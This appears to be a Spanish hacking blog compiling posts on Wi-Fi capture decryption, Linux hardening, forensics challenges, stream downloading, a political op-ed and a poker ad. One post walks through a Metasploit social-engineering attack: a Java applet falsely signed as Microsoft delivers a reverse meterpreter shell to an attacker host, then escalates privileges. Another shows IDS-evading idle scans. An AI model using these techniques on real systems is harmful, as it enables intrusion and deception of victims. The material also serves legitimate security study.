Banner 1

Descifrando WEP/WPA/WPA2 con Wireshark

0 comentarios
Una interezante entrada para las personas que esten aprendiendo de snifing por esto les regalo una copia , recuerden visitar el link original ya que posee muy buenos trabajos.
-------------------------------------------------------------------------------------------------

Wireshark nos brinda la posibilidad de descifrar capturas WEP/WPA/WPA2 de una forma muy sencilla, aunque claro, primero debemos conocer el password.

Pero lo interesante de esto, es que cualquiera podría capturar el tráfico "que pasa por el aire", sin conocer el password, y el día de mañana cuando sea posible obtenerlo, descifrarlo.

Por ejemplo, podríamos capturar todo el tráfico que pasa por un canal, o utilizar placas wireless especiales como AirPcap, para capturar varios canales a la vez:
airodump-ng mon0 --channel 6 -w captura.pcap
Si bien hay algoritmos de cifrado que tardarían cientos de años en ser rotos, siempre existe la posibilidad de que una mala implementación por un fabricante nos allane el camino.

Recuerdo que durante la ekoparty 2008, cuando Luciano Bello presento las vulnerabilidades para OpenSSL en Debian, entre la audiencia había muchas personas que decían tener capturas que a partir de ese momento podrían ser descifradas.

Para descifrar una captura con Wireshark, abrimos la captura, vamos a "Edit -> Preferences", desplegamos "Protocols" a la izquierda, y seleccionamos "IEEE 802.11", luego ponemos el password en el formato correspondiente:



Este post se iba a llamar "Desencriptando ...", como se acostumbra decir en Argentina, pero recordé a un español que me dijo que "desencriptar" significa "sacar a alguien de la cripta", y que el termino correcto era "descifrar".

Wikipedia: Criptología

"En ocasiones se emplean los verbos encriptar y cifrar como sinónimos, al igual que sus respectivas contrapartes, desencriptar y descifrar. No obstante, lo correcto es utilizar el término cifrar en lugar de encriptar, ya que se trata de un anglicismo sin reconocimiento académico, proveniente del término encrypt."

FUENTE:
http://kungfoosion.blogspot.com/2010/01/descifrando-wepwpawpa2-con-wireshark.html

scanner que desnuda para movil

0 comentarios
Muchos hemos visto este aviso "spam" en muchos sitios donde frecuentamos descargas y del cual es algo impactante poder hacer algo asi con un celular pero primero pregunten es posible hacerlo?.
Bueno lamento defraudarlos pero es una simple estrategia de ventas de esas que siempre hacen comprar a las personas, si no me crees simplemente les dejo los links de descarga para que lo comprueben ustedes mismos.

links de descarga:

giga

http://www.gigasize.com/get.php?d=0m738vvqfkd

megaupload

http://www.megaupload.com/?d=ZNSW3XIT

saludos y que les guste xD.

Fuente:
http://www.xthedaniex.com/2010/01/nude-scanner-v16-s60v5-j2me.html

Proteger servidor Linux contra ataques de fuerza bruta y denegación de servicios.

0 comentarios
Muy buenas herramientas citadas por gurudelainformatica para realizar nuestro hardening xD.
-------------------------------------------------------------------------------------

Con tres herramientas: BFD, APF y DDoS Deflate es posible mitigar ataques de fuerza bruta y denegación de servicios en servidores Linux.


APF.

Es un cortafuegos basado en iptables (netfilter) fácil de instalar y configurar, pero lo que lo hace indispensable es que es compatible con BFD y DDoS Deflate.

Configuración básica:

Una vez instalado su fichero de configuración se ubica en “/etc/apf/conf.apf”. En primer lugar se modifica la línea que le indica en que interface de red actuar en este caso eth0:

# Untrusted Network interface(s); all traffic on defined interface will be
# subject to all firewall rules. This should be your internet exposed
# interfaces. Only one interface is accepted for each value.
# NOTE: The interfacing structure is being worked towards support of MASQ/NAT
IFACE_IN="eth0"
IFACE_OUT="eth0"

Después es posible configurar los interfaces de red para que los ignore.

# Trusted Network interface(s); all traffic on defined interface(s) will by-pass
# ALL firewall rules, format is white space or comma seperated list.
IFACE_TRUSTED="eth1"

Luego puertos TCP de entrada permitidos.

# Common ingress (inbound) TCP ports
IG_TCP_CPORTS="80, 110,443"

Puertos UDP de entrada permitidos.

# Common ingress (inbound) UDP ports
IG_UDP_CPORTS=" 110"

Luego puertos TCP de salida permitidos.

# Common egress (outbound) TCP ports
EG_TCP_CPORTS="80, 110,443"

Puertos UDP de salida permitidos.

# Common egress (outbound) UDP ports
EG_UDP_CPORTS=" 110"

Entradas ICMP permitidas:

# Common ICMP (inbound) types
# 'internals/icmp.types' for type definition; 'all' is wildcard for any
IG_ICMP_TYPES="3,5,11"

Existen dos ficheros importantes para denegar el acceso “/etc/apf/deny_host.rules” y permitir acceso “/etc/apf/allow_host.rules” en ellos se pueden especificar IP, rangos, hosts…

Más información y descarga de APF:
http://www.rfxn.com/projects/advanced-policy-firewall/


BFD.

Es un script diseñado para monitorizar los logs de servicios que corren en el servidor: ssh, apache, ftp… en busca de fallos continuos de autentificación o excesos de conexión por parte de una IP. Una vez detectado una anomalía BFD activa APF para bloquear la IP atacante.

Configuración básica:

Una vez instalado su fichero de configuración se encuentra en “/usr/local/bfd/conf.bfd”. Lo primero que se configura es el TRIGGER, que es el número de intentos de conexión fallidos que permite BFD antes de actuar.

TRIG=10

Después configurar el envió de notificaciones por email para cada evento de BFD. Poniendo el valor 1 para activar y 0 para desactivar.

EMAIL_ALERTS=1
EMAIL_ADDRESS=administrador@servidor.es

Si queremos que BFD ignore alguna IP a la hora de bloquer intentos de conexión podemos indicar la IP en el archivo “/usr/local/bfd/ignore.hosts”.

Más información y descarga de BFD:
http://www.rfxn.com/projects/brute-force-detection/


DDoS Deflate.

Se trata de un script que monitoriza las conexiones al servidor a través de Netstat y bloquea con APF aquellas que realizan un ataque de negación de servicios.

Configuración básica:

Una vez instalado su fichero de configuración se encuentra en “/usr/local/ddos/ddos.conf”. La primera configuración es la frecuencia de ejecución en minutos.

FREQ=1

Después número de conexiones máximas permitidas antes de proceder a bloquear IP:

NO_OF_CONNECTIONS=160

Luego configuración para uso de APF para bloquear IP. Si se pone 0 usaría iptables.

APF_BAN=1

Tiempo en minutos, en el que la IP atacante será bloqueada:


BAN_PERIOD=500

Dirección de email a la que notificar cuando actúa DDoS Deflate.


EMAIL_TO=” administrador@servidor.es”

Más información y descarga de DDoS Deflate:
http://deflate.medialayer.com/

Auditar el impacto de ataques de denegación de servicios y fuerza bruta:
http://vtroger.blogspot.com/2009/02/auditar-el-impacto-de-ataques-de.html

FUENTE:
http://vtroger.blogspot.com/2010/01/proteger-servidor-linux-contra-ataques.html

Ingeniería Social con Applets firmados de Java en MetaSploit

0 comentarios
Una traduccion del episodio 185 muy buena realizada por kunfoosion, sin mas detalles les dejo la entrada.
--------------------------------------------------------------------------------------

En el episodio 185 de PaulDotCom, Carlos Perez explicó como utilizar un nuevo módulo para MetaSploit escrito por Natron, que nos permite crear applets firmados de Java con un payload malicioso.

Lo estuve probando y funciona muy bien, lo único a tener en cuenta es que la víctima debe tener instalado JRE previamente, luego es solo un ataque de ingeniería social, ya que no estamos explotando ninguna vulnerabilidad en un software.

Esta todo muy bien explicado en las notas técnicas del webcast, pero les dejo un resumen de los comandos a continuación:

Antes de llegar a MetaSploit, primero debemos instalar algunas librerías en BackTrack:

# Instalamos Sun Java JDK
apt-get install sun-java6-jdk

# Configuramos Sun Java JDK
echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
echo "export JAVA_HOME" >> /etc/bash.bashrc
JAVA_HOME=/usr/lib/jvm/java-6-sun
export JAVA_HOME

# Instalamos la rjb gem
gem install rjb


Luego actualizamos MetaSploit ya que el módulo es muy reciente:

cd /pentest/exploits/framework3
svn update


Lo que vamos a hacer a continuación, es levantar un servidor Web malicioso, que cuando a alguien se conecte a la URL "http://IP_Atacante/kungfoosion", le entregue un applet de java firmado por quien nosotros queramos, y si el usuario decide aceptarlo, ese código se ejecutará en su sistema y vamos a obtener una shell de meterpreter.

El servidor Web lo levantamos en el puerto 80, con "SRVPORT", y escuchamos la conexión reversa de la víctima en el puerto 443, con "LPORT". Con la opción "CERTCN", indicamos por quien va a estar firmado el applet:

./msfconsole
use exploit/multi/browser/java_signed_applet
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.168.0.157
set LPORT 443
set TARGET 1
set URIPATH kungfoosion
set SRVPORT 80
set CERCN Microsoft Corporation
exploit


Una vez que el usuario ingresa a "http://10.168.0.157/kungfoosion", si no posee JRE instalado, le aparecerá la siguiente advertencia en Firefox, preguntándole si lo desea instalar:


Si ya tiene JRE instalado, simplemente le preguntara a la Víctima si confia en el applet de ese website:


Una vez que estamos en meterpreter, podemos utilizar todos los comandos que este nos provee, si usamos "getuid" vamos a ver que estamos corriendo con los privilegios de "Administrador". Ahora, si nos ponemos golosos, también podríamos escalar privilegios a SYSTEM ejecutando "run kitrap0d", el reciente exploit local para Windows de 17 años de antigüedad:


Eso es todo, muy divertido para una tarde de Sábado :)


FUENTE:
http://kungfoosion.blogspot.com/2010/01/ingenieria-social-con-applets-firmados.html
- PaulDotCom Episode 185

Pensiones a congresistas

0 comentarios
Bueno como siempre les comparto "reflexiones" que llegan al correo y sobre todo siempre aclaro que no tengo autoria sobre el mismo =).

como saben el futuro puede ser interne y no solo por causa de los robots si no tambien por causa de malos dirigentes en este correo explican algo que en realidad no se la verdad del asunto pero aqui siempre estaremos dispuestos a debatir hasta la mas absurda idea.

-------------------------------------------------------------------------------------

andilejas. Por: Alberto José Holguín
Pensiones a congresistas



(EL PAIS CALI)
Octubre 28 de 2009






Al escribir estas líneas no pretendo frenar la iniciativa que ya cursó los dos debates en el Senado, porque no tiene objeto, ya que será aprobada me guste o no y le guste o no al resto de los colombianos. Simplemente quiero sentar mi voz de protesta y dejar constancia del absurdo abuso que los mal llamados ‘padres de la Patria’ van a cometer.

Nuestro Congreso está totalmente desprestigiado, casi que repudiado por la ciudadanía, entre otras cosas por la triste verdad de que más de 70 de sus 268 miembros han sido o están siendo juzgados por la Corte Suprema de Justicia o se encuentran detenidos. Sin embargo, a los ‘honorables’ parlamentarios Aurelio Iragorri, Eduardo Enríquez, Carlos Cárdenas y Carlos Ferro no les tembló la mano para proponer la modificación de la Ley Cuarta de 1992, con el objeto de aumentarse el valor de sus pensiones de jubilación, iniciativa que probablemente recibió el aplauso de sus colegas. Esta inaudita actitud puede calificarse como una afrenta oprobiosa, monstruosa y vituperable contra el pueblo colombiano en un momento tan difícil como el que se está viviendo, cuando hay necesidades apremiantes de toda índole que no se pueden financiar y cuando el desempleo llega al 11%, sin contar el subempleo, que hace la situación laboral aterradora.

Actualmente, nuestros senadores y representantes devengan al mes $5.088.646 como sueldo básico, $9.046..485 de gastos de representación, $5.496.999 de prima de vivienda y $1..413.508 de prima de salud. Las partidas anteriores suman $21.045.638 cada 30 días.. Mientras tanto, el salario mínimo legal, que en el 2008 era de $461.500, pasó a partir del 1 de enero del 2009 a $497.000, un incremento de sólo $35.500, pues se consideró “inflacionario y peligroso para la economía nacional” aumentarlo algo más o redondearlo siquiera a los $500.000 mensuales. No hay derecho. Pero no contentos con los millones que devengan, los parlamentarios pretenden ahora reformar la legislación pensional para ellos, sólo para ellos, de tal forma que su mesada futura por jubilación pase de $11 millones a $16 millones mensuales, lo que equivale a un incremento del 45%. Sabrosa vida.

Así es muy difícil alcanzar la paz. Mientras sigan presentándose estas desigualdades es utópico pretender que no haya violencia social. Y lo más triste es que los respetados congresistas.inclutendo los de la izquierda, siguen haciéndole el juego al ausentismo, a las cosas torcidas, a lo malévolo, sin pensar en lo que de verdad le puede convenir al país y a los 42 millones de colombianos que dicen representar.



Y sin más lamentaciones, porque se las lleva el viento, tocará esperar ahora a que la iniciativa termine su trámite y los ‘sufridos’ parlamentarios agreguen otra conquista a su ya larga lista de prebendas.





ESTO NO LO PUBLICAN R.C.N. NI CARACOL, NI EL TIEMPO, PARA QUE EL PUEBLO IGNORANTE NO SE ENTERE DE LAS "LEYES" QUE HACEN LOS PADRES....DE LA PATRIA BOBA
ENTIENDO QUE TU ESTES CEGADO A VER VERDADES QUE NO PUBLICAN NI RCN NI CARACOL. PERO ESTO ES UNA REALIDAD QUE NO SE PUED ECHAR EN SACO ROTO.

Tomas Farfan

------------------------------------------------------------------------------------

Bien recalco algo:

La fecha de publicacion es algo "vieja" osea en estos momentos si hiba a pasar paso; tambien es para comparar el aumento del salario minimo... cuanto fue? como 10 mil pesos? eso no alcanza ni para la factura del telefono.

Tambien y lo mas fundamental Porque no publican nada en los medios de comunicacion? esa si es la verdad.

saludos roboticos

analisis al reto dj

4 comentarios
Bueno este documento no tiene como finalidad afectar la solucion del reto dragonjar ya que se escojio metodos no tradicionales para realizar el analisis.

Tambien esta dirigido a las personas que descargaron el reto y no sabian que hacer(novatos) hoy les quiero mostrar una forma de investigar caseramente sin saber mayores conceptos forenses aclaro que deben aprender a usar herramientas hechas para esto como pueden ser encase, autopsy y/u live cds especializados en el tema yo personalmente uso SIFT me ha gustado bastante.

Todos estos programas los encontraran en este blog :).

Bueno espero que aprendan.

Link descarga:

http://www.mediafire.com/?zmqmugm3jng

Referencias:

http://estegano.neobits.org/estegano/2009/12/segundo-tuto-de-ads-ocultando-cualquier-tipo-de-ficheros/ -->referencia ads extraccion del ejecutable
http://www.mediafire.com/?tgnjy0ynt0l --> Winhex portable (no version forense)
http://www.mediafire.com/?dgydvmtzliu --> detector de estenografia ads
http://www.mediafire.com/?xmm2aqzyzut --> recovery my files

saludos roboticos

Creando reto RaR...

0 comentarios
Para nuestro reto, primero debemos tener los siguientes ingredientes:

* 1 archivo rar (el contenido puede ser loque sea)
* Localhost (yo utilizo appserver en windXP y en ubuntu instale todo por separado)

primero creamos nuestro archivos rar, en este colocaremos un archivo txt que diga "Bingo!!!..."

ahora creamos un archivo php con el siguiente contenido



$contenidoRaR=file_get_contents('archivorar.rar'); //obtenemos el contenido del archivo "archivorar.rar"

echo $base64=base64_encode($contenido); //imprime el contenido del "archivorar.rar" codificado en Base64

file_put_contents('contenidoCifrado.txt', $base64); // escribe en el archivo "contenidoCifrado.txt" el contenido codificado del "archivorar.rar"...

listo! ya tenemos nuestro reto, ahora solo damos el Base64, y que ellos se las arreglen para leer "Bingo!!!...", pero como le hecemos nosotros para resolver nuestro propio reto?.

escribimos otro php

con la misma tecnica con la que creamos nuestro reto, con unas modificaciones muy minimas


$contenidoRaR=file_get_contents('contenidoCifrado.txt');//Obtenemos el contenido de "contenidoCifrado.txt"

echo $Resuelto=base64_decode($contenidoRaR); //Lo decodificamos y lo imprimimos

file_put_contents('solucion.rar', $Resuelto); // escribimos el contenido decodificado en "solucion.rar"

y tendremos nuestro rar, con la parola Bingo!!!...

hasta la proxima.

PD: esto lo podemos hacer con zip, 7z, casi cualquier cosa, pasenla bien

Blackubay

Metasploit: idle scanning y el IPID

4 comentarios
Hoy intentaremos saltarnos un sistema de detección de intrusos (IDS), al menos en teoría, porque no tengo ninguna maqueta montada para probarlo realmente. A la hora de usar nmap para comprobar la disponibilidad de algunos puertos de una Red es muy posible que cualquier IDS detecte los escaneos y emprenda algún tipo de acción.

El idle scanning se sirve del IPID para echarle el muerto del escaneo a otro ordenador zombie con lo que para hacerlo efectivo debemos -antes de nada- encontrar ese ordenador adecuado al que culpar.

Explicación del proceso

Para detectar si un puerto está abierto o cerrado, es necesario primero observar el IPID del zombie, enviar paquetes a la víctima haciéndole ver que realmente se los está enviando éste y, posteriormente, observar de nuevo el IPID utilizado por el intermediario. En función de los valores iniciales y finales obtenidos, se puede averiguar el estado del puerto destino.
  • El primer paso es enviar al zombie un paquete SYN+ACK, con objeto de que éste nos devuelva el paquete RST correspondiente, del cual tomaremos el IPID.
  • Acto seguido, se realiza una solicitud de conexión a la víctima, previa manipulación del paquete para que sea el zombie el que figure como origen del mismo. Al recibirlo, dado que estamos asumiendo que el puerto está abierto, la víctima envía de vuelta la confirmación de la conexión al que cree que es el solicitante, el zombie. Si el puerto estuviera cerrado la víctima devuelve al aparente emisor un paquete RST indicándole que no será posible establecer la conexión solicitada. El zombie recibe el paquete RST y lo ignora.
  • En caso de correcta conexión, el zombie recibe la confirmación de la conexión, pero como no es él el que la ha generado, responde a la víctima con una señal de reseteo (RST), incrementando su IPID.
  • De nuevo, pasado unos segundos, desde el atacante se vuelve a obtener el IPID del zombie de la misma forma que al comienzo, comprobando que ha sido incrementado en 2 unidades. De esta forma, se determina que el puerto destino del escaneo estaba abierto.
Teóricamente puede parecer algo lioso, aunque si se entiende el proceso el juego se vuelve mucho más divertido. Por suerte -o desgracia- todos estos pasos los podemos automatizar con Metasploit.

Encontrar un zombie

Pasando a la práctica, si queremos encontrar un zombie y utilizamos Metasploit es tan sencillo como usar el scanner que trae para ello:
msf auxiliary(writable) > use scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds

msf auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipidseq) > set THREADS 50
THREADS => 50
msf auxiliary(ipidseq) > run

[*] 192.168.1.1's IPID sequence class: All zeros
[*] 192.168.1.2's IPID sequence class: Incremental!
[*] 192.168.1.10's IPID sequence class: Incremental!
[*] 192.168.1.104's IPID sequence class: Randomized
[*] 192.168.1.109's IPID sequence class: Incremental!
[*] 192.168.1.111's IPID sequence class: Incremental!
[*] 192.168.1.114's IPID sequence class: Incremental!
[*] 192.168.1.116's IPID sequence class: All zeros
[*] 192.168.1.124's IPID sequence class: Incremental!
[*] 192.168.1.123's IPID sequence class: Incremental!
[*] 192.168.1.137's IPID sequence class: All zeros
[*] 192.168.1.150's IPID sequence class: All zeros
[*] 192.168.1.151's IPID sequence class: Incremental!
[*] Auxiliary module execution completed
Dentro de esa red local que hemos escaneado todas las máquinas etiquetadas como Incremental! son ordenadores zombie que podremos utilizar para hacer el escaneo silencioso.

Escaneo silencioso o invisible

Ya hemos hecho lo más complicado, seleccionar la máquina que cargará con nuestras culpas, el resto es cosa de nmap, tan solo hemos de utilizar cualquier ordenador de los etiquetados como Incremental! anteriormente como argumento -sI de nmap:
# nmap -P0 -p- -sI 192.168.1.2 192.168.1.150
Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-05 01:51 CET
Idle scan using zombie 192.168.1.2 (192.168.1.2:80); Class: Incremental
Interesting ports on 192.168.1.150:
Not shown: 996 closed|filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
MAC Address: 00:0C:29:41:F2:E8 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.56 seconds
La opción -P0 previene que nmap envíe un ping incial a la máquina destino. Esto disminuye la velocidad del escaneo (hay menos información disponible sobre los tiempos), pero asegura que ningún paquete sea enviado al destino desde nuestra verdadera dirección de IP.

La opción -p- se usa para escanear todos los puertos, no solo los "conocidos", pero el escaneo será más lento. El -sI es obvio, para usar el zombie en las peticiones.

Y teóricamente - deberíamos estar protegidos contra los detectores de escaneos.

FUENTE:
http://www.userlinux.net/metasploit-idle-scanning-y-el-ipid.html
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8026/entry/modules/auxiliary/scanner/ip/ipidseq.rb
http://nmap.org/idlescan-es.html

2010 y el blog bad-robot que piensa?

2 comentarios
Bueno primero que todo un feliz año para todos =).

Este año el blog tiene varios proyectos:

ezine bad-robot
wargame bad-robot
blog y moodle bad-robot-labs
adminsitracion avanzada de servicios entre otros temas extras

Las personas que quieran colaborar en estos proyectos son bienvenidos.

Espero este año actualizar los temas ya que el año pasado tuve asencias y ademas cambiar el tema del blog =) y si es posible un dominio.

saludos roboticos

Como bajar vídeos streaming

1 comentarios
El mes pasado les realize un post sobre estudios forenses en red, este año nuestro amigo txipi en su entrada de como bajar videos(abajo el link ) nos muestra como descargar videos que se ven en vivo (streaming) y que no se dejan descargar directamente. Me paresio muy buena entrada por eso se las comparto.

------------------------------------------------------------------------------------

Me he pasado unas cuantas horas intentando descargar un vídeo en Flash para no depender de mi conexión a Internet cuando quiera volver a verlo. Con Firefox no suelo tener mayor problema en hacerlo gracias a Video Download Helper, una extensión que a golpe de click te resuelve la papeleta casi siempre. Pero el caso de esta tarde quedaba fuera de los dominios de Video Download Helper, porque no se trataba de un vídeo en Flash (FLV) descargado desde la web (HTTP), sino del típico esquema reproductor multimedia en Flash + streaming de vídeo por RTMP.

En concreto, mi “reto” era descargar la entrevista de Stephen Colbert a Lawrence Lessig (os la recomiendo, muy buena ;-) ).

Buscando en gúguel llegué a páginas bastante desactualizadas que me hablaban de infinidad de programas para Win32 como GetFLV o ReplayAV que terminé probando en Wine y en una máquina Windows con VirtualBox, con poco éxito.

Cada vez que pulsaba el botón de play, mi frustración iba en aumento, porque tenía claro que “si se puede ver, se puede descargar”. Así que con el típico enfoque “moscas a cañonazos” que predomina en el recetario de este humilde blog, terminé dando con lo obvio (aunque como dijo Lacan: “Lo obvio suele pasar desapercibido, precísamente por obvio”, también procede el más castizo refrán: “vistos los cojones, toro”): capturar todo, buscar URLs en la captura y descargarlas.

Manos a la obra:

1. Captura de tráfico

Para capturar el tráfico, nada como el viejo tcpdump a todo trapo:

tcpdump -i eth0 -p -s 0 -w captura.pcap
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
^C7042 packets captured
7042 packets received by filter
0 packets dropped by kernel

2. Búsqueda en la captura

Para buscar, probamos con grep:

grep -i rtmp captura.pcap
Coincidencia en el fichero binario captura.pcap

Sabemos que estás ahí…

strings captura.pcap | grep rtmp
rtmp://cp9950.edgefcs.net/ondemand/mtvnorigin/gsp.comedystor/com/colbert/season_05/episode_004/cr_05004_05_240.flv
rtmp://cp9950.edgefcs.net/ondemand/mtvnorigin/gsp.comedystor/com/colbert/season_05/episode_004/cr_05004_05_480.flv
@rtmp://88.221.92.180:1935/ondemand?_fcs_vhost=cp9950.edgefcs.net

Perfecto, a por ello…

3. Descarga del stream de vídeo

Para bajar un flujo de datos en RTMP, rtmpdump o flvstreamer son nuestros aliados:

flvstreamer -r "rtmp://cp9950.edgefcs.net/ondemand/mtvnorigin/gsp.comedystor/com/colbert/season_05/episode_004/cr_05004_05_240.flv" -o colbert.flv
FLVStreamer v1.8e
(c) 2009 Andrej Stepanchuk, The Flvstreamer Team, license: GPL
Connecting ...
Starting download at 0.000 kB
Metadata:
duration 370.94
width 240
height 180
videodatarate 250
audiodatarate 80
framerate 14.98
creationdate Fri Jan 9 01:01:09 2009
lasttimestamp 370.91
lastkeyframetimestamp 368.97
videocodecid 4
audiocodecid 2
audiodelay 0
canSeekToEnd FALSE
filesize 12810455
videosize 8851208
audiosize 3879788
datasize 19758
ERROR: ReadPacket, failed to read RTMP packet body. len: 65812
Download may be incomplete (downloaded about 8.30%), try --resume
Closing connection.

Vaya, parece que se corta cada pocos bytes, probaremos usando la fuerza bruta y la opción “resume”:

while true; do flvstreamer --resume -r "rtmp://cp9950.edgefcs.net/ondemand/mtvnorigin/gsp.comedystor/com/colbert/season_05/episode_004/cr_05004_05_240.flv" -o colbert.flv; done

¡Genial! El FLV ya está en nuestro disco duro a buen recaudo. Ahora a remezclaro y vitaminarlo :-)

No olviden visitar la fuente original

FUENTE: http://blog.txipinet.com/2009/12/31/como-bajar-videos-flash-que-se-resisten-comedycentral-por-ejemplo/?utm_source=feedburner&utm_medium=email

saludos roboticos

Juegos de poker para jugar online.

0 comentarios
Diviertete jugando a los juegos favoritos de poker de internet.

Para comenzar a jugar cualquier Juegos Poker estas son las reglas basicas: Cada jugador recibe cinco cartas, con el objetivo de combinar sus cartas con las cartas en la mesa, logrando: carta más alta, una pareja, doble pareja, un trío, una escalera, color, full, poker, escalera de color o escalera real que es el valor más alto del poker.

Pacific Poker destaca en este mundo de poker online por su variado surtido de torneos freeroll con pagos elevados, ademas de ofrecer una gran variedad de juegos incluyendo
Omaha y stud, sin olvidarnos de su bono exclusivo de Bienvenida del 111%, de hasta US$444, esto le hace todo un lider en salas de poker online.

Para empezar a jugar en esta famosa sala de Poker, antes deberas Descargar Poker, es un sencillo programa, muy facil de instalar en tu ordenador y que hara que la experiencia de juego online sea casi tan real como ir a una sala de Poker de verdad.


El error más grande que jugadores novatos cometen en Texas Holdem es reaccionar con excitación en el juego y jugar demasiadas manos, piensa que cualquier gesto de alegria o tristeza en este juego puede delatar tu mano ganadora y solo debes de jugar las manos que en realidad le veas posibilidades de triunfo.
Powered by Bad Robot
Helped by Blackubay